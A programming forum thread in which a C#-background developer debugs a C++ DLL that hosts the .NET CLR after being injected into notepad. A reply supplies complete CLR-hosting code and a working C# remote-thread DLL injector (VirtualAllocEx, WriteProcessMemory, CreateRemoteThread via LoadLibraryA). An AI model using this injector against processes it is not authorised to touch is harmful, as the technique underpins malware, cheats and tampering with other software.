[c++] Error when starting CLR Runtime Host

[Danbannan]

Hello, i have been a member for quite a while but i havent written that much in here, so i guess a little introduction would be in place.
my name is Dan-Levi, i am 30 years old. I started out with server side web development about 12 years ago just until 4 years ago when i started learning c# and all that .NET shizzle, and now i am interested in learning about c++.

So im working in a simple dll injection which loads the CLR and (eventually) a managed dll. i am able to inject the unmanaged dll into the process (notepad in this case) , but i struggle getting CLR to start.

This is what i got so far:

Code:

#include "stdafx.h"
#include <Windows.h>
#include <metahost.h>
#pragma comment(lib, "mscoree.lib")

#import "mscorlib.tlb" raw_interfaces_only \
    high_property_prefixes("_get","_put","_putref") \
    rename("ReportEvent", "InteropServices_ReportEvent")

void LoadDotNet()
{
    HRESULT hr;
    ICLRMetaHost *pMetaHost = NULL;
    ICLRRuntimeInfo *pRuntimeInfo = NULL;
    ICLRRuntimeHost *pClrRuntimeHost = NULL;

    hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_PPV_ARGS(&pMetaHost));
    hr = pMetaHost->GetRuntime(L"v4.0.30319", IID_PPV_ARGS(&pRuntimeInfo));
    hr = pRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost,
        IID_PPV_ARGS(&pClrRuntimeHost));

    MessageBox(NULL, L"Runs up to here...", L"DEBUG", NULL);
    // start runtime
    hr = pClrRuntimeHost->Start();
    pMetaHost->Release();
    pRuntimeInfo->Release();
    pClrRuntimeHost->Release();
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
    )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        //printf("DLL Loaded!");
        LoadDotNet();
    }
    return TRUE;
}

So all HRESULT hr returns S_OK until i actually try to start CLR

Code:

hr = pClrRuntimeHost->Start();

Since im coming over from c# and have little to no experience writing c++, i understand the syntax and can make a understanding of the code, but i dont know exactly how to do errorhandling in the right manner in every situation.

I was hoping that some of you could have a look and give me some pointers so i can learn from this and eventually give back to the community with full source once it all is in place.

I want to know how i can debug my code once it is injected into the other process. I have tried to use try catch blocks but no exceptions is thrown from clr and the even inside the try block it crashes.

I want to add that after i inject this dll the clr.dll is in the list of loaded dll's (Process Explorer) but it seems that it fails to start.
I am running this on a Windows 10 X64 setup.

Cheers and thanks for the great community with alot of cool content.

[XTBZ]

I found this by searching

#include <windows.h>
#include <mscoree.h>
#include <metahost.h>
#pragma comment(lib, "mscoree.lib")

wchar_t szDllName[] = L"DummyNetApplication.dll";
wchar_t szDllMain[] = L"DummyNetApplication.Program";
wchar_t szDllEntryPoint[] = L"EntryPoint";
wchar_t szDllParams[] = L"Parameter";
wchar_t szDllPath[MAX_PATH];

void StartTheDotNetRuntime()
{
ICLRMetaHost *pMetaHost = nullptr;
ICLRRuntimeInfo *pRuntimeInfo = nullptr;
ICLRRuntimeHost *pRuntimeHost = nullptr;
CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID*)&pMetaHost);
pMetaHost->GetRuntime(L"v4.0.30319", IID_ICLRRuntimeInfo, (LPVOID*)&pRuntimeInfo);
BOOL loadable = FALSE;
pRuntimeInfo->IsLoadable(&loadable);
if (loadable == FALSE)
return;
pRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost, (LPVOID*)&pRuntimeHost);
BOOL isStarted;
DWORD startupFlags;
pRuntimeInfo->IsStarted(&isStarted, &startupFlags);
if (!isStarted)
{
pRuntimeHost->Start();
pRuntimeInfo->BindAsLegacyV2Runtime();
}
pRuntimeHost->ExecuteInDefaultAppDomain(szDllPath, szDllMain, szDllEntryPoint, szDllParams, nullptr);
if (pRuntimeHost != nullptr)
pRuntimeHost->Release();

if (pRuntimeInfo != nullptr)
pRuntimeInfo->Release();

if (pMetaHost != nullptr)
pMetaHost->Release();
}

BOOL WINAPI DllMain()
{
CreateThread(nullptr, 0, (LPTHREAD_START_ROUTINE)&StartTheDotNetRuntime, nullptr, 0, nullptr);
return TRUE;
}

public class Program
{
public static int EntryPoint()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new StatelessForm());
return 0;
}
}

public class CodeInjector
{
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, int bInheritHandle, uint dwProcessId);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern int CloseHandle(IntPtr hObject);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr GetModuleHandle(string lpModuleName);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern int WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] buffer, uint size, int lpNumberOfBytesWritten);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttribute, IntPtr dwStackSize, IntPtr lpStartAddress,
IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

private static CodeInjector _instance;

public static CodeInjector GetInstance
{
get { return _instance ?? (_instance = new CodeInjector()); }
}

public InjectionResult Inject(string sProcName, string sDllPath)
{
if (!File.Exists(sDllPath))
{
return InjectionResult.DllNotFound;
}

var procs = Process.GetProcesses();
var procId = (from t in procs where t.ProcessName == sProcName select (uint)t.Id).FirstOrDefault();

if (procId == 0)
{
return InjectionResult.ProcessNotFound;
}

if (!Inject(procId, sDllPath))
{
return InjectionResult.InjectionFailed;
}

return InjectionResult.InjectionSucceed;
}

private static bool Inject(uint pToBeInjected, string sDllPath)
{
var hndProc = OpenProcess((0x2 | 0x8 | 0x10 | 0x20 | 0x400), 1, pToBeInjected);

if (hndProc == IntPtr.Zero)
{
return false;
}

var lpLlAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");

if (lpLlAddress == IntPtr.Zero)
{
return false;
}

var lpAddress = VirtualAllocEx(hndProc, (IntPtr)null, (IntPtr)sDllPath.Length, (0x1000 | 0x2000), 0X40);

if (lpAddress == IntPtr.Zero)
{
return false;
}

var bytes = Encoding.ASCII.GetBytes(sDllPath);

if (WriteProcessMemory(hndProc, lpAddress, bytes, (uint)bytes.Length, 0) == 0)
{
return false;
}

if (CreateRemoteThread(hndProc, (IntPtr)null, IntPtr.Zero, lpLlAddress, lpAddress, 0, (IntPtr)null) == IntPtr.Zero)
{
return false;
}

CloseHandle(hndProc);

return true;
}
}

[Danbannan]

Thats it! My problem is that i dont spawn a new thread. Since CreateThread is a call to kernel32 it is safe to do in DllMain.

Just doing this:

Code:

BOOL APIENTRY DllMain(HMODULE hModule,
  DWORD  ul_reason_for_call,
  LPVOID lpReserved
  )
{
  switch (ul_reason_for_call)
  {
  case DLL_PROCESS_ATTACH:
    //printf("DLL Loaded!");
    CreateThread(NULL, 0,
      (LPTHREAD_START_ROUTINE)LoadDotNet, NULL, 0, NULL);
  }
  return TRUE;
}

solved my problem. Now to the fun part.

[XTBZ]

It's good